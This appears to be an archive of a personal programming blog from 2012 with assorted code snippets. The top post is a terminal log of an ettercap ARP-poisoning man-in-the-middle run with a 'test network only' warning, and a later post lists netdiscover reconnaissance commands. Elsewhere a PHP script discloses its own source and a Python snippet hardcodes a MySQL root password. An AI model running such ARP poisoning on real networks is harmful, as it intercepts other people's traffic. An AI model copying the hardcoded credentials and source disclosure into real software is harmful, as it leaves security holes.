Thursday, December 20, 2012

Ettercap using browser plugin. Do not do this outside of test network

>interface=en0
>echo $interface
en0
>ip=192.168.15.18
>echo $ip
192.168.15.18
>sudo ettercap -T -Q -M arp:remote -i $interface /$ip/ // -P remote_browser
Password:

ettercap 0.7.4.1 copyright 2001-2011 ALoR & NaGA

Listening on en0... (Ethernet)

   en0 -> 7C:D1:C3:E9:51:23     192.168.15.18     255.255.255.0

SSL dissection needs a valid 'redir_command_on' script in the etter.conf file
Privileges dropped to UID 65534 GID 65534...

  28 plugins
  40 protocol dissectors
  55 ports monitored
7587 mac vendor fingerprint
1766 tcp OS fingerprint
2183 known services

Randomizing 255 hosts for scanning...
Scanning the whole netmask for 255 hosts...
* |==================================================>| 100.00 %

1 hosts added to the hosts list...

ARP poisoning victims:


 GROUP 2 : ANY (all the hosts in the list)
Starting Unified sniffing...


Text only Interface activated...
Hit 'h' for inline help

Activating remote_browser plugin...

suff .htm
REMOTE COMMAND: mozilla -remote openurl(http://interface.eyecon.ro/demos/drag.html)
REMOTE COMMAND: mozilla -remote openurl(http://en.wikipedia.org/)
suff .php

Press q to quit properly!

Closing text interface...

ARP poisoner deactivated.
RE-ARPing the victims...
Unified sniffing was stopped.

>

Saturday, November 10, 2012

Sunday, August 19, 2012

Uppercase for Person Names with and without Hyphen

function uclo($input) { 
  $pos = strpos($input, "-");
  if($pos === false) { return ucfirst(strtolower($input)); }
  else { $inputArr =explode("-", $input); 
  return ucfirst(strtolower($inputArr[0]))."-".ucfirst(strtolower($inputArr[1]));}
}
$firstName = "lAnce";
$lastName = "lincoln-Miller";
"Hello ".uclo($firstName)." ".uclo($lastName).".";

Hello Lance Lincoln-Miller.

Wednesday, August 1, 2012

MAMP Scripts PHP and Apache logs, starting MySQL

PHP logs for MAMP

#!/usr/bin/env bash
cat /Applications/MAMP/logs/php_error.log
echo "        /Applications/MAMP/logs/php_error.log"

Apache logs for MAMP

#!/usr/bin/env bash
cat /Applications/MAMP/logs/apache_error.log
echo "        /Applications/MAMP/logs/apache_error.log"

Start MAMP mysql on command line

echo "cd /Applications/MAMP/Library/bin";
echo "hit enter";
READ;
cd /Applications/MAMP/Library/bin;
echo "/Applications/MAMP/Library/bin/mysql -uroot -p";
echo "hit enter";
READ;
/Applications/MAMP/Library/bin/mysql -uroot -p;

Saturday, July 14, 2012

Javascript Object Detection

Example objects used to "rough" detect a particular browser
Scheme Detects
document.getElementById Firefox1+, IE5+, Opera7+, Safari, and most modern browsers in general.
window.getComputedStyle Firefox1+ and Opera 8+, and Safari 2+
window.globalStorage Firefox2+
window.globalStorage && window.postMessage Firefox3+
document.getElementsByClassName Firefox3+ and Opera 9.5+, and Safari 3+
document.querySelector Firefox3.5+, IE8+ (in standards compliant mode only), Opera9.5+, and Safari 3+
document.all IE4+
window.attachEvent IE5+
window.createPopup IE5.5+
document.compatMode && document.all IE6+
window.XMLHttpRequest IE7+, Firefox1+, and Opera8+
window.XMLHttpRequest && document.all

or:

document.documentElement && typeof document.documentElement.style.maxHeight!="undefined"

IE7+

Note: First scheme will fail if visitor explicitly disables native xmlHTTPRequest support (under Toolbar-> Internet Options-> Advanced). The second one will not.

XDomainRequest IE8+
document.documentMode IE8+ (detects IE8 in a specific document mode, such as standards complaint).

Because IE8 can render a page in various different modes depending on the page's doctype plus the presence of certain HTML elements, documentMode is an IE8+ property that returns a different number depending on the mode the page is being rendered in. They are:

5 Page is running in IE5 mode (aka "quirks mode").
7 Page is running in IE7 standards mode.
8 Page is running in IE8 standards mode.
9 Page is running in IE9 standards mode.

This means that even though the user is using IE8 or IE9, for example, if a webpage is missing a valid doctype, document.documentMode will return 5.

XDomainRequest && window.msPerformance IE9+

window.msPerformance is a IE9+ property you can use to detect IE9. There are other IE9 only window properties you can use in place of it as well for the purpose. See a list here.

window.opera Opera (any version)

* Since Opera by default also identifies itself as IE (apart from Opera), with support for many of IE's proprietary objects, the IE detection schemes above will also return true for Opera. Use "window.opera" in combination to filter out Opera browsers.

if (document.documentElement && typeof document.documentElement.style.maxHeight!="undefined")
alert("You're using IE7")

The following detects a page using IE8 standards compliant mode:

if (document.documentMode==8)
alert("IE8 standards mode")

Sunday, July 1, 2012

Music Frequencies as Javascript Variables

<script type="text/javascript" >

var notes = [ 
 ['C' , '16.35'] , 
 ['C#' , '17.32'] , 
 ['D' , '18.35'] , 
 ['Eb' , '19.45'] , 
 ['E' , '20.60'] , 
 ['F' , '21.83'] , 
 ['F#' , '23.12'] , 
 ['G' , '24.50'] , 
 ['G#' , '25.96'] , 
 ['A' , '27.50'] , 
 ['Bb' , '29.14'] , 
 ['B' , '30.87'] , 
 ['C' , '32.70'] , 
 ['C#' , '34.65'] , 
 ['D' , '36.71'] , 
 ['Eb' , '38.89'] , 
 ['E' , '41.20'] , 
 ['F' , '43.65'] , 
 ['F#' , '46.25'] , 
 ['G' , '49.00'] , 
 ['G#' , '51.91'] , 
 ['A' , '55.00'] , 
 ['Bb' , '58.27'] , 
 ['B' , '61.74'] , 
 ['C' , '65.41'] , 
 ['C#' , '69.30'] , 
 ['D' , '73.42'] , 
 ['Eb' , '77.78'] , 
 ['E' , '82.41'] , 
 ['F' , '87.31'] , 
 ['F#' , '92.50'] , 
 ['G' , '98.00'] , 
 ['G#' , '103.8'] , 
 ['A' , '110.0'] , 
 ['Bb' , '116.5'] , 
 ['B' , '123.5'] , 
 ['C' , '130.8'] , 
 ['C#' , '138.6'] , 
 ['D' , '146.8'] , 
 ['Eb' , '155.6'] , 
 ['E' , '164.8'] , 
 ['F' , '174.6'] , 
 ['F#' , '185.0'] , 
 ['G' , '196.0'] , 
 ['G#' , '207.7'] , 
 ['A' , '220.00'] , 
 ['Bb' , '233.1'] , 
 ['B' , '246.9'] , 
 ['C' , '261.6'] , 
 ['C#' , '277.2'] , 
 ['D' , '293.7'] , 
 ['Eb' , '311.1'] , 
 ['E' , '329.6'] , 
 ['F' , '349.2'] , 
 ['F#' , '370.0'] , 
 ['G' , '392.0'] , 
 ['G#' , '415.3'] , 
 ['A' , '440.0'] , 
 ['Bb' , '466.2'] , 
 ['B' , '493.9'] , 
 ['C' , '523.3'] , 
 ['C#' , '554.4'] , 
 ['D' , '587.3'] , 
 ['Eb' , '622.3'] , 
 ['E' , '659.3'] , 
 ['F' , '698.5'] , 
 ['F#' , '740.0'] , 
 ['G' , '784.0'] , 
 ['G#' , '830.6'] , 
 ['A' , '880.0'] , 
 ['Bb' , '932.3'] , 
 ['B' , '987.8'] , 
 ['C' , '1047'] , 
 ['C#' , '1109'] , 
 ['D' , '1175'] , 
 ['Eb' , '1245'] , 
 ['E' , '1319'] , 
 ['F' , '1397'] , 
 ['F#' , '1480'] , 
 ['G' , '1568'] , 
 ['G#' , '1661'] , 
 ['A' , '1760'] , 
 ['Bb' , '1865'] , 
 ['B' , '1976'] , 
 ['C' , '2093'] , 
 ['C#' , '2217'] , 
 ['D' , '2349'] , 
 ['Eb' , '2489'] , 
 ['E' , '2637'] , 
 ['F' , '2794'] , 
 ['F#' , '2960'] , 
 ['G' , '3136'] , 
 ['G#' , '3322'] , 
 ['A' , '3520'] , 
 ['Bb' , '3729'] , 
 ['B' , '3951'] , 
 ['C' , '4186'] , 
 ['C#' , '4435'] , 
 ['D' , '4699'] , 
 ['Eb' , '4978'] , 
 ['E' , '5274'] , 
 ['F' , '5588'] , 
 ['F#' , '5920'] , 
 ['G' , '6272'] , 
 ['G#' , '6645'] , 
 ['A' , '7040'] , 
 ['Bb' , '7459'] , 
 ['B' , '7902']  
                  ] ;

</script>

Monday, May 14, 2012

Walk DOM and report ID's and Parents

function walkReport() {
$("body").find("*").andSelf().each(function() {
    var parent = $(this).parent().attr("id");
    console.log(this.nodeName+" "+this.id+" and my parent is "+parent);   
});
}

Sunday, May 6, 2012

One Wire On Fire 1-Wire Automation Management Tool

This is a project I'm designing and coding. Far from done as of this post, but I hope to have it reasonably functional by July 2012.

Python: Error Handling

import traceback
def formatExceptionInfo(maxTBlevel=5):
         cla, exc, trbk = sys.exc_info()
         excName = cla.__name__
         try:
             excArgs = exc.__dict__["args"]
         except KeyError:
             excArgs = ""
         excTb = traceback.format_tb(trbk, maxTBlevel)
         return (excName, excArgs, excTb)

try:
         x = x + 1
except:
         print formatExceptionInfo()

Thursday, May 3, 2012

Python: Kill Self

import os
def properExit():
 os.system('kill %d' % os.getpid())

Wednesday, May 2, 2012

my .vimrc

syntax off
set number
set columns=120
set ruler

Friday, April 13, 2012

Basic ssh login script

#!/usr/bin/env bash
ip="127.0.0.1";
u="joe";
p="2222"
webport="8080";
while true;
do
echo "http://$ip:$webport":
echo "ssh -p $p $u@$ip";
read -p "press enter";
ssh -p $p $u@$ip;
done

Tuesday, March 20, 2012

Create an associative array in PHP

Some of you may dislike the distraction of a full set of working code with core lesson of associative arrays buried in it. Their are plenty of minimalist examples on the web, and when I wanted an example they were too minimalist. Core code for reference is in this color scheme.

deviceNickNames.txt
10.AF2551010800|no nickname
22.20F21A000000|no nickname
22.650E1B000000|no nickname
29.A29F09000000|no nickname
$deviceNickNamesTxt = "deviceNickNames.txt";
 if (file_exists($deviceNickNamesTxt)) {  
     $lines=explode("\n", file_get_contents($deviceNickNamesTxt)); 
       foreach($lines as $line) { 
                                 $items=explode("|",$line);
                          if(isset($items[1])) { $devicesB[$items[0]]= $items[1]; } 
                    }
                                     }

print "\n<form name=\"setupForm\" action=\"\" method=\"GET\">\n<table>\n<tr><th>Device Hardcoded Name</th><th>Human Friendly Name</th></tr>\n";
foreach($devicesB as $name => $value) {
print "\n<tr>";
print "\n<td valign=\"center\" align=\"center\">".$name."</td>";
print "\n<td valign=\"center\" align=\"center\">\n";
inputText($name."_NAME", $value, "");
submit("");
print "</td>\n</tr>\n";
    }
print "\n</table>\n</form>\n"
Device Hardcoded NameHuman Friendly Name
10.AF2551010800
22.20F21A000000
22.650E1B000000
29.A29F09000000

Friday, March 9, 2012

Boiler plate ajax.php file

Hello, I am /ajax.php
To make me work properly please send GET or POST data
I am designed to not need editing, all the things you want to add to my functionality
should be written in a file called /home/cyr/public_html/inc/ajax.txt
Also, I am intelligent enough to see there is no /home/cyr/public_html/inc/ajax.txt
I leave it up to you to create that.
Below is /home/cyr/public_html/ajax.php source code
===============================
<?php
if(isset($_GET['test'])) { error_reporting(E_ALL);ini_set('display_errors', '1'); }
if(isset($_POST['test'])) { error_reporting(E_ALL);ini_set('display_errors', '1'); }
header("Content-Type: text/plain");
$page=getenv("SCRIPT_NAME"); 
$query=getenv("QUERY_STRING");
$referer=getenv("HTTP_REFERER"); 
$ip=getenv("REMOTE_ADDR");
$docRoot=getenv('DOCUMENT_ROOT');
if(isset($_GET['test'])) { foreach($_GET as $name => $value) { print "\n".$name." : ".$value; } die();}
if(isset($_POST['test'])) { foreach($_POST as $name => $value) { print "\n".$name." : ".$value; } die();}
$includesDir="inc";
$includesDir=getcwd()."/".$includesDir;
$file=$includesDir."/".basename($page,"php")."txt";
if((count($_GET) < 1) && (count($_POST) < 1)) {
 print "Hello, I am ".$page."\n";
 print "To make me work properly please send GET or POST data\n";
 print "I am designed to not need editing, all the things you want to add to my functionality\n";
 print "should be written in a file called ".$file."\n";
  if(!is_dir($includesDir)) { print "Also, I see there is no ".$includesDir."\nPlease create this directory and place a file named '".basename($page,"php")."txt' in it";}   
  elseif(!is_file($file)) { print "Also, I am intelligent enough to see there is no ".$file."\nI leave it up to you to create that.\n"; }
  
  print "Below is ".$_SERVER['SCRIPT_FILENAME']." source code\n===============================\n";
  print file_get_contents($_SERVER['SCRIPT_FILENAME']);
  print "\n";
 if (is_file($file)) {
 print "Below is ".$file." source code\n===============================\n";
  print file_get_contents($file);
 } 
 die();
                                               }  
is_file($file) ?  include($file) : print $file." does not exist"; 
die();
?>

Wednesday, February 29, 2012

netdiscover

Not saying anything smart in this post, just placing here as note to self about the name of this tool and basic commands to get it started if I'm on a new machine that needs it.



sudo apt-get install netdiscover
sudo netdiscover
sudo netdiscover -r 192.168.1.0/24
sudo netdiscover -i wlan0 -r 192.168.1.0/24
sudo netdiscover -h
Netdiscover 0.3-beta7 [Active/passive arp reconnaissance tool]
Written by: Jaime Penalba 

Usage: netdiscover [-i device] [-r range | -l file | -p] [-s time] [-n node] [-c count] [-f] [-d] [-S] [-P] [-C]
  -i device: your network device
  -r range: scan a given range instead of auto scan. 192.168.6.0/24,/16,/8
  -l file: scan the list of ranges contained into the given file
  -p passive mode: do not send anything, only sniff
  -F filter: Customize pcap filter expression (default: "arp")
  -s time: time to sleep between each arp request (miliseconds)
  -n node: last ip octet used for scanning (from 2 to 253)
  -c count: number of times to send each arp reques (for nets with packet loss)
  -f enable fastmode scan, saves a lot of time, recommended for auto
  -d ignore home config files for autoscan and fast mode
  -S enable sleep time supression betwen each request (hardcore mode)
  -P print results in a format suitable for parsing by another program
  -L in parsable output mode (-P), continue listening after the active scan is completed

If -r, -l or -p are not enabled, netdiscover will scan for common lan addresses.

Thursday, January 19, 2012

Print just the name of the running Python program

#!/usr/bin/env python
import sys
import os
for i in sys.argv:
        print i
print sys.argv[0]
print os.path.basename(sys.argv[0].split(".")[0])
#>bin/test.py 56 555
bin/test.py
56
555
bin/test.py
test

Sunday, January 1, 2012

MySQL Connect in Python

#!/usr/bin/env python
import pymysql

conn = pymysql.connect(host='localhost', user='root', passwd='cyrushellborg666', db='brewing')
cur = conn.cursor()
cur.execute("SHOW TABLES")
# print cur.description
# r = cur.fetchall()
# print r
# ...or...
for r in cur:
   print r
cur.close()
conn.close()